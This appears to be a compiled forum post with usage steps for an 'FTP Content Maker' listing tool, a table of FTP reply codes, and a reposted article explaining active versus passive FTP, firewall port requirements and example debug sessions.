ht*p://www.etplanet.com/download/application/FTP%20Content%20Maker%201.02.zip

1. Put in the IP of the server. Do not put "ftp://" or a "/" because it will not work if you do so.
2. Put in the port. If the port is the default number, 21, you do not have to enter it.
3. Put in the username and password in the appropriate fields. If the login is anonymous, you do not have to enter it.
4. If you want to list a specific directory of the FTP, place it in the directory field. Otherwise, do not enter anything in the directory field.
5. Click "Take the List!"
6. After the list has been taken, click the UBB output tab, and copy and paste to wherever you want it.

If FTP Content Maker is not working, it is probably because the server does not utilize Serv-U Software.

If you get this error message:
StatusCode = 550
LastResponse was : 'Unable to open local file test-ftp'
Error = 550 (Unable to open local file test-ftp)
Error = Unable to open local file test-ftp = 550
Close and restart FTP Content Maker, then try again.

error messages:

110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm Where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").
120 Service ready in nnn minutes.
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message. On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.
215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document.
220 Service ready for new user.
221 Service closing control connection. Logged out if appropriate.
225 Data connection open; no transfer in progress.
226 Closing data connection. Requested file action successful (for example, file transfer or file abort).
227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pending further information.
421 Too many users logged to the same account
425 Can't open data connection.
426 Connection closed; transfer aborted.
450 Requested file action not taken. File unavailable (e.g., file busy).
451 Requested action aborted: local error in processing.
452 Requested action not taken. Insufficient storage space in system.
500 Syntax error, command unrecognized. This may include errors such as command line too long.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. File unavailable (e.g., file not found, no access).
551 Requested action aborted: page type unknown.
552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset).
553 Requested action not taken. File name not allowed.

Active FTP vs. Passive FTP, a Definitive Explanation

Introduction
One of the most commonly seen questions when dealing with firewalls and other Internet connectivity issues is the difference between active and passive FTP and how best to support either or both of them. Hopefully the following text will help to clear up some of the confusion over how to support FTP in a firewalled environment.

This may not be the definitive explanation, as the title claims, however, I've heard enough good feedback and seen this document linked in enough places to know that quite a few people have found it to be useful. I am always looking for ways to improve things though, and if you find something that is not quite clear or needs more explanation, please let me know! Recent additions to this document include the examples of both active and passive command line FTP sessions. These session examples should help make things a bit clearer. They also provide a nice picture into what goes on behind the scenes during an FTP session. Now, on to the information...

The Basics
FTP is a TCP based service exclusively. There is no UDP component to FTP. FTP is an unusual service in that it utilizes two ports, a 'data' port and a 'command' port (also known as the control port). Traditionally these are port 21 for the command port and port 20 for the data port. The confusion begins however, when we find that depending on the mode, the data port is not always on port 20.

Active FTP
In active mode FTP the client connects from a random unprivileged port (N > 1024) to the FTP server's command port, port 21. Then, the client starts listening to port N+1 and sends the FTP command PORT N+1 to the FTP server. The server will then connect back to the client's specified data port from its local data port, which is port 20.

From the server-side firewall's standpoint, to support active mode FTP the following communication channels need to be opened:

FTP server's port 21 from anywhere (Client initiates connection)
FTP server's port 21 to ports > 1024 (Server responds to client's control port)
FTP server's port 20 to ports > 1024 (Server initiates data connection to client's data port)
FTP server's port 20 from ports > 1024 (Client sends ACKs to server's data port)

In step 1, the client's command port contacts the server's command port and sends the command PORT 1027. The server then sends an ACK back to the client's command port in step 2. In step 3 the server initiates a connection on its local data port to the data port the client specified earlier. Finally, the client sends an ACK back as shown in step 4.

The main problem with active mode FTP actually falls on the client side. The FTP client doesn't make the actual connection to the data port of the server--it simply tells the server what port it is listening on and the server connects back to the specified port on the client. From the client side firewall this appears to be an outside system initiating a connection to an internal client--something that is usually blocked.

Active FTP Example
Below is an actual example of an active FTP session. The only things that have been changed are the server names, IP addresses, and user names. In this example an FTP session is initiated from testbox1.slacksite.com (192.168.150.80), a linux box running the standard FTP command line client, to testbox2.slacksite.com (192.168.150.90), a linux box running ProFTPd 1.2.2RC2. The debugging (-d) flag is used with the FTP client to show what is going on behind the scenes. Everything in red is the debugging output which shows the actual FTP commands being sent to the server and the responses generated from those commands. Normal server output is shown in black, and user input is in bold.

There are a few interesting things to consider about this dialog. Notice that when the PORT command is issued, it specifies a port on the client (192.168.150.80) system, rather than the server. We will see the opposite behavior when we use passive FTP. While we are on the subject, a quick note about the format of the PORT command. As you can see in the example below it is formatted as a series of six numbers separated by commas. The first four octets are the IP address while the second two octets comprise the port that will be used for the data connection. To find the actual port multiply the fifth octet by 256 and then add the sixth octet to the total. Thus in the example below the port number is ( (14*256) + 178), or 3762. A quick check with netstat should confirm this information.

testbox1: {/home/p-t/slacker/public_html} % ftp -d testbox2
Connected to testbox2.slacksite.com.
220 testbox2.slacksite.com FTP server ready.
Name (testbox2:slacker): slacker
---> USER slacker
331 Password required for slacker.
Password: TmpPass
---> PASS XXXX
230 User slacker logged in.
---> SYST
215 UNIX Type: L8
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
ftp: setsockopt (ignored): Permission denied
---> PORT 192,168,150,80,14,178
200 PORT command successful.
---> LIST
150 Opening ASCII mode data connection for file list.
drwx------ 3 slacker users 104 Jul 27 01:45 public_html
226 Transfer complete.
ftp> quit
---> QUIT
221 Goodbye.

Passive FTP
In order to resolve the issue of the server initiating the connection to the client a different method for FTP connections was developed. This was known as passive mode, or PASV, after the command used by the client to tell the server it is in passive mode.

In passive mode FTP the client initiates both connections to the server, solving the problem of firewalls filtering the incoming data port connection to the client from the server. When opening an FTP connection, the client opens two random unprivileged ports locally (N > 1024 and N+1). The first port contacts the server on port 21, but instead of then issuing a PORT command and allowing the server to connect back to its data port, the client will issue the PASV command. The result of this is that the server then opens a random unprivileged port (P > 1024) and sends the PORT P command back to the client. The client then initiates the connection from port N+1 to port P on the server to transfer data.

From the server-side firewall's standpoint, to support passive mode FTP the following communication channels need to be opened:

FTP server's port 21 from anywhere (Client initiates connection)
FTP server's port 21 to ports > 1024 (Server responds to client's control port)
FTP server's ports > 1024 from anywhere (Client initiates data connection to random port specified by server)
FTP server's ports > 1024 to remote ports > 1024 (Server sends ACKs (and data) to client's data port)

In step 1, the client contacts the server on the command port and issues the PASV command. The server then replies in step 2 with PORT 2024, telling the client which port it is listening to for the data connection. In step 3 the client then initiates the data connection from its data port to the specified server data port. Finally, the server sends back an ACK in step 4 to the client's data port.

While passive mode FTP solves many of the problems from the client side, it opens up a whole range of problems on the server side. The biggest issue is the need to allow any remote connection to high numbered ports on the server. Fortunately, many FTP daemons, including the popular WU-FTPD allow the administrator to specify a range of ports which the FTP server will use. See Appendix 1 for more information.

The second issue involves supporting and troubleshooting clients which do (or do not) support passive mode. As an example, the command line FTP utility provided with Solaris does not support passive mode, necessitating a third-party FTP client, such as ncftp.

With the massive popularity of the World Wide Web, many people prefer to use their web browser as an FTP client. Most browsers only support passive mode when accessing ftp:// URLs. This can either be good or bad depending on what the servers and firewalls are configured to support.

Passive FTP Example
Below is an actual example of a passive FTP session. The only things that have been changed are the server names, IP addresses, and user names. In this example an FTP session is initiated from testbox1.slacksite.com (192.168.150.80), a linux box running the standard FTP command line client, to testbox2.slacksite.com (192.168.150.90), a linux box running ProFTPd 1.2.2RC2. The debugging (-d) flag is used with the FTP client to show what is going on behind the scenes. Everything in red is the debugging output which shows the actual FTP commands being sent to the server and the responses generated from those commands. Normal server output is shown in black, and user input is in bold.

Notice the difference in the PORT command in this example as opposed to the active FTP example. Here, we see a port being opened on the server (192.168.150.90) system, rather than the client. See the discussion about the format of the PORT command above, in the Active FTP Example section.

testbox1: {/home/p-t/slacker/public_html} % ftp -d testbox2
Connected to testbox2.slacksite.com.
220 testbox2.slacksite.com FTP server ready.
Name (testbox2:slacker): slacker
---> USER slacker
331 Password required for slacker.
Password: TmpPass
---> PASS XXXX
230 User slacker logged in.
---> SYST
215 UNIX Type: L8
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> ls
ftp: setsockopt (ignored): Permission denied
---> PASV
227 Entering Passive Mode (192,168,150,90,195,149).
---> LIST
150 Opening ASCII mode data connection for file list
drwx------ 3 slacker users 104 Jul 27 01:45 public_html
226 Transfer complete.
ftp> quit
---> QUIT
221 Goodbye.

Summary
The following chart should help admins remember how each FTP mode works:

Active FTP :
command : client >1024 -> server 21
data : client >1024 <- server 20

Passive FTP :
command : client >1024 -> server 21
data : client >1024 -> server >1024

A quick summary of the pros and cons of active vs. passive FTP is also in order:

Active FTP is beneficial to the FTP server admin, but detrimental to the client side admin. The FTP server attempts to make connections to random high ports on the client, which would almost certainly be blocked by a firewall on the client side. Passive FTP is beneficial to the client, but detrimental to the FTP server admin. The client will make both connections to the server, but one of them will be to a random high port, which would almost certainly be blocked by a firewall on the server side.

Luckily, there is somewhat of a compromise. Since admins running FTP servers will need to make their servers accessible to the greatest number of clients, they will almost certainly need to support passive FTP. The exposure of high level ports on the server can be minimized by specifying a limited port range for the FTP server to use. Thus, everything except for this range of ports can be firewalled on the server side. While this doesn't eliminate all risk to the server, it decreases it tremendously.